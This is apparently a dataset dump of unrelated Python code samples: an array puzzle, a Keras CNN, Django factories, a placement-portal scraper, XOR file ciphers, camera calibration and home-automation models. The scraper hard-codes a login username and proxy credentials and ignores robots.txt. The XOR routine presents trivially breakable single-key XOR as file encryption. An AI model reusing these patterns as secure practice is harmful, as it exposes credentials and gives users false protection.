StarcoderdataPython
6429499
# This problem was asked by Google. # Given an array of integers, return a new array where each element in the new array # is the number of smaller elements to the right of that element in the original input array. # For example, given the array [3, 4, 9, 6, 1], return [1, 1, 2, 1, 0], since: # • There is 1 smaller element to the right of 3 # • There is 1 smaller element to the right of 4 # • There are 2 smaller elements to the right of 9 # • There is 1 smaller element to the right of 6 # • There are no smaller elements to the right of 1 #### class Node: def insert(self, val, ctr = 0): if not self.val: self.val = val return ctr if val < self.val: if not self.left: self.left = Node() return self.left.insert(val, ctr) else: if not self.right: self.right = Node() # Trace the number of right sifts and element goes through. # This would give us the number of previously numbers it is grater than. return self.right.insert(val, ctr + 1) def __init__(self): self.left = None self.right = None self.val = None def numbers_less_than(arr): root = Node() sol = [] # Insert elements in reverse order. The tree is built with the intent to # return the appropriate counters for each element. for x in reversed(arr): sol.insert(0, root.insert(x)) return sol #### print(numbers_less_than([3, 4, 9, 6, 1]))
StarcoderdataPython
5087795
import numpy as np import pandas as pds from keras.models import Sequential from keras.layers import Input, Dense, Dropout, BatchNormalization from keras.wrappers.scikit_learn import KerasRegressor from sklearn.model_selection import cross_val_score from sklearn.model_selection import KFold from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler from sklearn.pipeline import Pipeline from sklearn.metrics import mean_squared_error from keras.callbacks import EarlyStopping from keras.layers.convolutional import Conv1D from keras.layers.pooling import MaxPooling1D from keras.optimizers import Adam import keras from keras.layers.core import Dense, Activation, Dropout, Flatten from keras.utils import plot_model from keras.callbacks import TensorBoard from keras.datasets import cifar10 from keras.utils import np_utils import sys import threading import os import pandas as pd from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt from sklearn.metrics import confusion_matrix, accuracy_score, f1_score import itertools from sklearn import model_selection from keras.optimizers import Adam import numpy as np from keras.models import Sequential from keras.layers import Dense, Dropout from keras.optimizers import RMSprop from sklearn.model_selection import StratifiedKFold import seaborn as sns from keras import backend as K import tensorflow as tf sns.set(style="whitegrid", color_codes=True) ####################################### # # please insert code here to prepare input data(x) and supervised data(y) # or please run the program "3 Dimensional Data.py" first to fill in x and y # NEED TO BE CHANGE subject = ["Edo1", "Edo2", "Hyo", "Kei", "Michael", "Ren", "Seiji", "Takuya"] num_of_subject = 8 num_of_data = 150 # number of data for each cut data excel file movement = ["gentlestroke", "notouch", "poke", "press", "scratch"] num_of_movement = 5 # number of movement types total_file = [30, 5, 30, 30, 30] # number of excel files for each corresponding movement # STATIC VAR main_directory = "D:/TUAT/GV Lab Research Internship/Machine Learning/Data/Normalized_Cut_Data/Sensor1/" #dont forget to change the sensor's name!!! # DYNAMIC VAR coordinate = 0 # 0 for X, 1 for Y, 2 for Z i = 0 # counting number of data in each file counter = 0 # counting total file for EACH movement types move = 0 # counting number of movement types file = 0 # counting number of total file # calculating total number of file N = 0 for j in range(0, num_of_movement): N = N + total_file[j]*num_of_subject #3 dimensional matrix to be filled up x = np.zeros((N, num_of_data, 3)) #(z,y,x) #matrix to be filled up y = np.zeros((N, 1)) # Iteration to fill up the 3 dimensional matrix input & the supervised data for people in range (0, num_of_subject): #subject change directory = main_directory + subject[people] + "/" + str(num_of_data) while move < num_of_movement: # movement change while counter < total_file[move]: # file change y[file, 0] = move file_read = pd.read_excel( directory + "/" + movement[move] + "n_" + str(num_of_data) + "_" + str(counter) + ".xlsx", "Sheet") while coordinate < 3: # coordinate change for i in range(0, (num_of_data)): # data change x[file, i, coordinate] = file_read[coordinate][i] coordinate += 1 i = 0 counter += 1 file += 1 coordinate = 0 move += 1 counter = 0 move = 0 print (x) print (y) print ("3 Dimensional Data-------end") ####################################### #YOU CAN CHANGE THIS PART #test_size = percentage of the data that will be used for testing the model (X_train, X_test, y_train, y_test) = train_test_split(x, y, test_size=0.3) print('split out') nb_classes = 5 #CHANGE NUMBER OF CLASSES HERE fold_num = 5 Y_train = np_utils.to_categorical(y_train, nb_classes) Y_test = np_utils.to_categorical(y_test, nb_classes) # Y_train = np.reshape(np.array(y_train),(420)) # Y_test = np.reshape(np.array(y_test),(1,180)) train_X = np.reshape(np.array(X_train), (X_train.shape[0], 450)) train_X = np.reshape(np.array(train_X), (X_train.shape[0], 450, 1)) test_X = np.reshape(np.array(X_test), (X_test.shape[0], 450)) test_X = np.reshape(np.array(test_X), (X_test.shape[0], 450, 1)) # input_x = K.placeholder(shape=(None, train_X.shape[1], train_X.shape[2]), name='X') # input_y = K.placeholder(shape=(None, nb_classes), name='Y') print('ready') def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') # → UPPER (edited) # モデルの定義 model = Sequential() model.add(Conv1D(64, 3, padding='same', input_shape=(450, 1))) model.add(Activation('relu')) model.add(Conv1D(64, 3, padding='same')) model.add(Activation('relu')) model.add(MaxPooling1D(2, padding='same')) model.add(Conv1D(128, 3, padding='same')) model.add(Activation('relu')) model.add(Conv1D(128, 3, padding='same')) model.add(Activation('relu')) model.add(MaxPooling1D(2, padding='same')) model.add(Conv1D(256, 3, padding='same')) model.add(Activation('relu')) model.add(Conv1D(256, 3, padding='same')) model.add(Activation('relu')) model.add(Conv1D(256, 3, padding='same')) model.add(Activation('relu')) model.add(MaxPooling1D(2, padding='same')) model.add(Conv1D(512, 3, padding='same')) model.add(Activation('relu')) model.add(Conv1D(512, 3, padding='same')) model.add(Activation('relu')) model.add(Conv1D(512, 3, padding='same')) model.add(Activation('relu')) model.add(Flatten()) model.add(Dense(4096)) model.add(Dense(4096)) model.add(Dropout(0.5)) model.add(Dense(5)) #CHANGE HERE TO CHANGE THE NUMBER OF CLASSES model.add(Activation('softmax')) adam = Adam(lr=1e-4) model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=["accuracy"]) model.summary() epochs = 100 #YOU CAN CHANGE THIS PART #this is for the early stops when the loss start to increase instead of decreasing #early_stopping = EarlyStopping(patience=2,atience=5, verbose=1, mode verbose=1) # es_cb = EarlyStopping(monitor='val_loss', p='auto') #bacth_size = changing the number of file will be used before updating the weights and bias in 1 epoch #validation_split = the percentage of the data that will be used for the validation during the training history = model.fit(x=train_X, y=Y_train, batch_size=10, validation_split=0.3, epochs=epochs) plt.plot(range(len(history.history['loss'])), history.history['loss'], label='loss') plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'], label='val_loss') plt.xlabel('epoch') plt.ylabel('loss') plt.legend() plt.show() #YOU CAN CHANGE THIS PART #this is the file name to save the CNN Model (cnn_model.json) and the weights (cnn_model_weights.hdf5) json_string = model.to_json() open(os.path.join('./', 'cnn_model.json'), 'w').write(json_string) model.save_weights(os.path.join('./', 'cnn_model_weight.hdf5')) score = model.evaluate(test_X, Y_test, verbose=0) print('Test loss:', score[0]) print('Test accuracy:', score[1]) pred_y = model.predict(test_X) pred_Y = np.argmax(pred_y, axis=1) pred_Y = pred_Y[:, np.newaxis] # 縦ベクトル confusion_matrix(y_test, pred_Y) print(f1_score(y_test, pred_Y, average='macro')) # Compute confusion matrix cnf_matrix = confusion_matrix(y_test, pred_Y) np.set_printoptions(precision=2) # Plot non-normalized confusion matrix class_names = ["", "", "", ""] plt.figure() plot_confusion_matrix(cnf_matrix, classes=class_names, title='Confusion matrix, without normalization') # Plot normalized confusion matrix plt.figure() plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True, title='Normalized confusion matrix') plt.show() # →LOWER (edited)
StarcoderdataPython
6456185
<reponame>tejpratap545/E-Commerce-Application from backend.users.models import User from factory import post_generation from factory.django import DjangoModelFactory from faker import Faker from oauth2_provider.models import Application from typing import Any, Sequence import factory fake = Faker() class UserFactory(DjangoModelFactory): class Meta: model = User django_get_or_create = ["email"] contact_number = fake.phone_number() email = fake.email() first_name = fake.first_name() last_name = fake.last_name() date_of_birth = fake.date_of_birth() @post_generation def password(self, create: bool, extracted: Sequence[Any], **kwargs): password = "<PASSWORD>" self.set_password(password) class AdminUserFactory(UserFactory): is_admin = True class SuperUserFactory(DjangoModelFactory): class Meta: model = User django_get_or_create = ["email"] contact_number = fake.phone_number() email = fake.email() first_name = fake.first_name() last_name = fake.last_name() date_of_birth = fake.date_of_birth() is_superuser = True @post_generation def password(self, create: bool, extracted: Sequence[Any], **kwargs): password = "<PASSWORD>" self.set_password(password) class SellerUserFactory(UserFactory): is_seller = True class ApplicationFactory(DjangoModelFactory): class Meta: model = Application django_get_or_create = ["name"] name = fake.name() authorization_grant_type = "password" client_type = "confidential" user = factory.SubFactory(SuperUserFactory)
StarcoderdataPython
1728939
<gh_stars>1-10 import mechanize import http.cookiejar from bs4 import BeautifulSoup as bs import json import pandas as pd # Browser br = mechanize.Browser() # Cookie Jar cj = http.cookiejar.LWPCookieJar() br.set_cookiejar(cj) # Browser options br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.set_proxies({"http": "s.barnwal:[email protected]:3128"}) br.addheaders = [('User-agent', 'Chrome')] # The site we will navigate into, handling it's session br.open('https://online.iitg.ernet.in/tnp/') # Select the second (index one) form (the first form is a search query box) br.select_form(nr=0) # User credentials br.form['username'] = 's.barnwal' br.form['password'] = '' # Login br.submit() # open all jobs list page = br.open('https://online.iitg.ernet.in/tnp/student/job_all_list.jsp') # open in Beautiful soup soup = bs(page, "lxml") all_tables=soup.find_all('table') right_table=soup.find('table', class_='table taable-responsive table-hover') #start storing information #storage containers company = [] designation = [] profile = [] links = [] eligibility10 = [] eligibility12 = [] bdesCTC = [] btechCTC = [] mdesCTC = [] mtechCTC = [] maCTC = [] mscCTC = [] phdCTC = [] msrCTC = [] allCTC = [bdesCTC, btechCTC, mdesCTC, mtechCTC, maCTC, mscCTC, phdCTC, msrCTC] resumeShortlist = [] techTest = [] aptiTest = [] gd = [] eligibleDepts = [] # main code for row in right_table.find_all("tr"): cells = row.find_all("td") if len(cells) == 6: company.append(cells[1].string.replace("\n", "")) designation.append(cells[2].string.replace("\n", "")) profile.append(cells[3].string.replace("\n", "")) link = cells[5].a['href'] links.append(link) # find job details # open job link companyLink = "https://online.iitg.ernet.in/tnp/student/" + link companyPage = br.open(companyLink) companySoup = bs(companyPage, "lxml") # eligibity eligibilityTable = companySoup.select_one("#Eligibility table") for row in eligibilityTable.find_all("tr"): cells = row.find_all("td") if len(cells) == 4: eligibility10.append(cells[0].string) eligibility12.append(cells[1].string) # ctc ctcTable = companySoup.select_one("#Salary_Details table") i = 0 for row in ctcTable.find_all("tr"): cells = row.find_all("td") if len(cells) == 4: if cells[1].string == "0.00": allCTC[i%len(allCTC)].append("NA") else: allCTC[i%len(allCTC)].append(cells[1].string) i = i+1 # shortlist from resume resume = companySoup.select_one("#Selection_Process > .row:nth-of-type(5) > .col-md-10") resumeShortlist.append(resume.string) # technical test tech = companySoup.select_one("#Selection_Process > .row:nth-of-type(6) > .col-md-10") techTest.append(tech.string) # aptitude test apti = companySoup.select_one("#Selection_Process > .row:nth-of-type(7) > .col-md-10") aptiTest.append(apti.string) # group discussion g = companySoup.select_one("#Selection_Process > .row:nth-of-type(12) > .col-md-10") gd.append(g.string) # eligible depts eligibleTable = companySoup.select_one("#Eligible_Programmes_and_Departments table") depts = {} for row in eligibleTable.find_all('tr'): cells = row.find_all('td') if len(cells) == 6: key = cells[1].string.replace("\n", "") + ", " + cells[3].string.replace("\n", "") + ", " + cells[4].string.replace("\n", "") depts[key] = cells[5].string toReplace = '{""}' string = json.dumps(depts, sort_keys=True, indent=0) for i in toReplace: string = string.replace(i, '') eligibleDepts.append(string) # make dataframe final_dataframe = pd.DataFrame( {'Company Name': company, 'Designation': designation, 'Profile': profile, '10th %': eligibility10, '12th %': eligibility12, 'CTC for B.Des': bdesCTC, 'CTC for B.Tech': btechCTC, 'CTC for M.Des': mdesCTC, 'CTC for M.Tech': mtechCTC, 'CTC for M.A.': maCTC, 'CTC for M.Sc': mscCTC, 'CTC for Ph.D.': phdCTC, 'CTC for M.S(R)': msrCTC, 'Resume shortlist': resumeShortlist, 'Technical test': techTest, 'Aptitude test': aptiTest, 'Group discussion': gd, 'Eligible departments': eligibleDepts }) # final_dataframe.to_excel("ccd.xlsx") final_dataframe.to_csv(path_or_buf="boo.csv", index=False)
StarcoderdataPython
1658779
#!/usr/bin/python3 from random import randint def randhex(): i = randint(0,255) return bytes([i]) def divider1(fname): divisor = 2 fp1 = open(fname, 'rb') fp2 = open(fname+'.out1', 'wb') fp3 = open(fname+'.out2', 'wb') i = 0 c = fp1.read(1) while c: if(i%divisor==0): fp2.write(c) else: fp2.write(randhex()) c = fp1.read(1) i+=1 fp2.close() i = 0 fp1.seek(0) c = fp1.read(1) while c: if(i%divisor==1): fp3.write(c) else: fp3.write(randhex()) c = fp1.read(1) i+=1 fp3.close() fp1.close() def swapper1(fname): pivot = 0b10101010 fp1 = open(fname, 'rb') fp2 = open(fname+'.out1', 'wb') fp3 = open(fname+'.out2', 'wb') c = fp1.read(1) while c: ec = encrypt(c, pivot) fp2.write(ec) dec = encrypt(ec, pivot) fp3.write(dec) c = fp1.read(1) fp3.close() fp2.close() fp1.close() def encrypt(_bytes, pivot): '''''' assert len(_bytes)==1 return bytes([_bytes[0] ^ pivot]) def encrypt_file(fname, passphrase): UNIT=8 # 8bits per byte bitkey = ''.join([bin(ord(c)).lstrip('0b').zfill(UNIT) for c in passphrase]) keysize, remainder = divmod(len(bitkey),UNIT) #import pdb; pdb.set_trace() assert remainder == 0 #assert is_multiple_of_two(keysize) pivot = int(bitkey, 2) key_in_bytes = convert_to_bytes(pivot, UNIT) fp1 = open(fname, 'rb') fp2 = open(fname+'.out1', 'wb') bits = fp1.read(keysize) while bits: ec = encrypt_mbitwise(bits, key_in_bytes) fp2.write(ec) bits = fp1.read(UNIT) fp2.close() fp1.close() def convert_to_bytes(integer, bytes_size): '''returns bytes that is converted from given integer''' result = bytearray() src = bin(integer).lstrip('0b').zfill(bytes_size*8) for i in range(0, len(src), 8): _int = int(src[i:i+8],2) result.append(_int) return bytes(result) def encrypt_mbitwise(bytes, key_in_bytes): '''returns encrypted bytes in type of bytearray''' return bytearray([a^b for a,b in zip(bytes, key_in_bytes)]) def is_multiple_of_two(n): '''returns true if n is multiple of two, else false''' return 0 <= bin(n).count('1') <= 1 if __name__=="__main__": import sys fname = sys.argv[1] encrypt_file(fname, '루이보스보리차!@#') #encrypt_file(fname, 'password') #encrypt_file(fname, '<PASSWORD>')
StarcoderdataPython
8174856
<gh_stars>1-10 import cv2 from cv2 import aruco import numpy as np import matplotlib.pyplot as plt images=[ "board/0.jpg", "board/1.jpg", "board/2.jpg", "board/3.jpg", "board/4.jpg", "board/5.jpg", "board/6.jpg", "board/7.jpg", "board/8.jpg", "board/9.jpg", "board/10.jpg", "board/11.jpg", "board/12.jpg", "board/13.jpg", "board/14.jpg", "board/15.jpg", "board/16.jpg", "board/17.jpg", "board/18.jpg", "board/19.jpg", "board/20.jpg", "board/21.jpg", "board/22.jpg", "board/23.jpg", ] close_images=[ "board/0.jpg", "board/1.jpg", "board/6.jpg", "board/8.jpg", "board/9.jpg", "board/10.jpg", "board/11.jpg", "board/12.jpg", "board/13.jpg", "board/14.jpg", "board/15.jpg", "board/16.jpg", "board/17.jpg", "board/18.jpg", "board/19.jpg", "board/20.jpg", "board/21.jpg", "board/22.jpg", "board/23.jpg", ] images=close_images images=[ "board2/1.jpg", "board2/2.jpg", "board2/3.jpg", "board2/4.jpg", "board2/5.jpg", "board2/6.jpg", "board2/7.jpg", ] aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_250) board = aruco.CharucoBoard_create(8, 5, 0.36, .27, aruco_dict) #imboard = board.draw((2000, 2000)) #cv2.imwrite("chessboard.tiff", imboard) def read_chessboards(images): """ Charuco base pose estimation. """ print("POSE ESTIMATION STARTS:") allCorners = [] allIds = [] decimator = 0 # SUB PIXEL CORNER DETECTION CRITERION criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.00001) for im in images: print("=> Processing image {0}".format(im)) frame = cv2.imread(im) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) corners, ids, rejectedImgPoints = cv2.aruco.detectMarkers(gray, aruco_dict) if len(corners)>0: # SUB PIXEL DETECTION for corner in corners: cv2.cornerSubPix(gray, corner, winSize = (3,3), zeroZone = (-1,-1), criteria = criteria) res2 = cv2.aruco.interpolateCornersCharuco(corners,ids,gray,board) if res2[1] is not None and res2[2] is not None and len(res2[1])>3 and decimator%1==0: allCorners.append(res2[1]) allIds.append(res2[2]) decimator+=1 imsize = gray.shape return allCorners,allIds,imsize allCorners,allIds,imsize=read_chessboards(images) def calibrate_camera(allCorners,allIds,imsize): """ Calibrates the camera using the dected corners. """ print("CAMERA CALIBRATION") cameraMatrixInit = np.array([[ 1000., 0., imsize[0]/2.], [ 0., 1000., imsize[1]/2.], [ 0., 0., 1.]]) distCoeffsInit = np.zeros((5,1)) flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO) (ret, camera_matrix, distortion_coefficients0, rotation_vectors, translation_vectors, stdDeviationsIntrinsics, stdDeviationsExtrinsics, perViewErrors) = cv2.aruco.calibrateCameraCharucoExtended( charucoCorners=allCorners, charucoIds=allIds, board=board, imageSize=imsize, cameraMatrix=cameraMatrixInit, distCoeffs=distCoeffsInit, flags=flags, criteria=(cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9)) return ret, camera_matrix, distortion_coefficients0, rotation_vectors, translation_vectors ret, mtx, dist, rvecs, tvecs = calibrate_camera(allCorners,allIds,imsize) print ret print " ----------" print mtx print " ----------" print dist i=2# select image id plt.figure() frame = cv2.imread(images[i]) img_undist = cv2.undistort(frame,mtx,dist,None) plt.subplot(1,2,1) plt.imshow(frame) plt.title("Raw image") plt.axis("off") plt.subplot(1,2,2) plt.imshow(img_undist) plt.title("Corrected image") plt.axis("off") plt.show() ################################################################### #Piere version: K16VGA_RESOLUTION = {"x": 2560, "y": 1920} CAMERA_RESOLUTIONS = [1,2,3,4,5,6,7] CAMERA_DISTORTION_COEFF = np.array( [[0.13086823, -0.44239733, 0.0004841, -0.00322714, 0.16996254]]) CAMERA_MATRIX_RESOLUTION_2560_1920 = np.array([ [2.41523736e+03, 0.00000000e+00, 1.25128063e+03], [0.00000000e+00, 2.41690366e+03, 9.94791007e+02]]) CAMERA_MATRIX_RESOLUTION_INDEPENDANT = np.array([ [0.00000000e+00, 0.00000000e+00, 1.00000000e+00] ]) CAMERA_DATAS_AT_RESOLUTION = { camera_resolution: { "matrix": np.append( CAMERA_MATRIX_RESOLUTION_2560_1920 / (2.**i), CAMERA_MATRIX_RESOLUTION_INDEPENDANT, axis=0 ), "image_size": ( K16VGA_RESOLUTION["x"] / (2**i), K16VGA_RESOLUTION["y"] / (2**i) ), "fps": 5, } for i, camera_resolution in enumerate(CAMERA_RESOLUTIONS) } print CAMERA_DATAS_AT_RESOLUTION mtx = np.array([[1.20761868e+03, 0.00000000e+00, 6.25640315e+02], [0.00000000e+00, 1.20845183e+03, 4.97395504e+02], [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
StarcoderdataPython
6450881
class BiosModelReaction: def __init__(self, json, api=None, uid=None, id=None, model=None): self.json_data = json self.api = api #self.database = database @property def id(self): return self.json_data['id'] @property def uid(self): return self.json_data['bios_id'] @property def name(self): return self.json_data['name'] def decode_stoich_value(self, v): if v == None or len(v.strip()) == 0: return 1 else: return float(v) def get_stoichiometry(self): s = {} for o in self.json_data['bios_stoichiometry']['l']: s[o[0]] = -1 * self.decode_stoich_value(o[2]) for o in self.json_data['bios_stoichiometry']['r']: s[o[0]] = self.decode_stoich_value(o[2]) return s def get_cstoichiometry(self, metabolites): s = {} for o in self.json_data['bios_stoichiometry']['l']: if o[0] in metabolites: s[(o[0], metabolites[o[0]]['compartment'])] = -1 * self.decode_stoich_value(o[2]) for o in self.json_data['bios_stoichiometry']['r']: if o[0] in metabolites: s[(o[0], metabolites[o[0]]['compartment'])] = self.decode_stoich_value(o[2]) return s @property def cstoichiometry(self): cstoichiometry = {} if 'bios_stoichiometry' in self.json_data: for h in self.json_data['bios_stoichiometry']['l']: if type(h[2]) == str and len(h[2]) == 0: h[2] = '1' cstoichiometry[(h[0], '?')] = -1 * float(h[2]) for h in self.json_data['bios_stoichiometry']['r']: if type(h[2]) == str and len(h[2]) == 0: h[2] = '1' cstoichiometry[(h[0], '?')] = float(h[2]) return cstoichiometry
StarcoderdataPython
8192625
<reponame>rputh055/crawlzerotest from django.conf.urls import url from crawlzero import views # SET THE NAMESPACE! app_name = 'crawlzero' # Be careful setting the name to just /login use userlogin instead! urlpatterns=[ url(r'^register/$',views.register,name='register'), url(r'^user_login/$',views.user_login,name='user_login'), url(r'^upload_file/$',views.upload_file,name='upload_file'), ]
StarcoderdataPython
6579616
from datetime import time from typing import List, Optional class Arduino: def __init__(self, id: int, name: str, template_id: int): self.__id = id self.name = name self.template_id = template_id @property def id(self) -> int: return self.__id class Template: def __init__(self, id: int, name: str, nb_input_pins: int, nb_output_pins: int): self.__id = id self.name = name self.nb_input_pins = nb_input_pins self.nb_output_pins = nb_output_pins @property def id(self) -> int: return self.__id class OutputPin: def __init__(self, id: int, number: int, parent_id: int): self.parent_id = parent_id self.number = number self.__id = id @property def id(self) -> int: return self.__id class InputPin: def __init__(self, id: int, number: int, action_ids: List[int], parent_id: int, time_between_clicks: float): self.parent_id = parent_id self.action_ids = action_ids self.number = number self.time_between_clicks = time_between_clicks self.__id = id @property def id(self) -> int: return self.__id class Action: def __init__(self, id: int, action_type: int, trigger_id: int, notification_ids: List[int], delay: int, timer: int, output_pin_ids: List[int], condition_id: Optional[int], master_id: Optional[int], click_number: int, dimmer_speed: Optional[int], cancel_on_button_release: Optional[bool], dimmer_light_value: Optional[int], master_dimmer_id: Optional[int]): """ Creates a new Action :param id: The identifier of this action :param action_type: The kind of action. See src.button.domain.ActionType class for possible values :param trigger_id: The identifier of the trigger of this action :param notification_ids: The identifiers of the notifications of this action. Can be empty. :param delay: The delay before this action should be executed. :param timer: The timer after which the action should be reverted. Only applies for ON/OFF actions :param output_pin_ids: The identifiers of the output pins affected by this action. :param condition_id: The (optional) identifier of the condition that should apply for this action. :param master_id: The master pin that should determine the TOGGLE action. This pin will be looked at when determining whether it should toggle on or off :param click_number: Number of times that has to be clicked on multiclick action to activate :param dimmer_speed: How fast/slow the dimmer has to change light intensity :param cancel_on_button_release: If this is set to true, the dimmer will stop dimming as soon as the button is released :param dimmer_light_value: If set to -1, a dimmer will remember its last known value before switching off If set to a value, a dimmer will go to this value by default/not remember last value :param master_dimmer_id: The identifier of the dimmer whose last known value should be taken when switching the dimmer on. """ # General properties self.__id = id self.__trigger_id = trigger_id self.__action_type = action_type self.__delay = delay self.__output_pin_ids = output_pin_ids self.__notification_ids = notification_ids self.__condition_id = condition_id self.__click_number = click_number # ON/OFF/ON_DIMMER/OFF_DIMMER action self.__timer = timer # TOGGLE/TOGGLE_DIMMER action self.__master_id = master_id # DIMMER self.__dimmer_speed = dimmer_speed self.__cancel_on_button_release = cancel_on_button_release # ON_DIMMER/TOGGLE_DIMMER action self.__dimmer_light_value = dimmer_light_value self.__master_dimmer_id = master_dimmer_id @property def id(self) -> int: return self.__id @property def trigger_id(self) -> int: return self.__trigger_id @property def action_type(self) -> int: return self.__action_type @property def notification_ids(self) -> List[int]: return self.__notification_ids @property def delay(self) -> int: return self.__delay @property def output_pin_ids(self) -> List[int]: return self.__output_pin_ids @property def timer(self) -> int: return self.__timer @property def condition_id(self) -> Optional[int]: return self.__condition_id @property def master_id(self) -> Optional[int]: return self.__master_id @property def click_number(self) -> int: return self.__click_number @property def dimmer_speed(self) -> Optional[int]: return self.__dimmer_speed @property def cancel_on_button_release(self) -> Optional[bool]: return self.__cancel_on_button_release @property def dimmer_light_value(self) -> Optional[int]: return self.__dimmer_light_value @property def master_dimmer_id(self) -> Optional[int]: return self.__master_dimmer_id class Trigger: def __init__(self, id: int, trigger_type: int, seconds_down: Optional[int]): self.__id = id self.trigger_type = trigger_type self.seconds_down = seconds_down @property def id(self) -> int: return self.__id class Condition: def __init__(self, id: int, type: int, operator: Optional[int], condition_ids: Optional[List[int]], output_pin_id: Optional[int], status: Optional[bool], from_time: Optional[time], to_time: Optional[time]): self.__id = id self.type = type self.to_time = to_time self.from_time = from_time self.status = status self.output_pin_id = output_pin_id self.condition_ids = condition_ids self.operator = operator @property def id(self) -> int: return self.__id class Notification: def __init__(self, id: int, message: str, notification_type: int, enabled: bool, subject: Optional[str], mail_address: List[str], tokens: List[str]): self.__id = id self.notification_type = notification_type self.message = message self.enabled = enabled self.subject = subject self.emails = mail_address self.tokens = tokens @property def id(self) -> int: return self.__id
StarcoderdataPython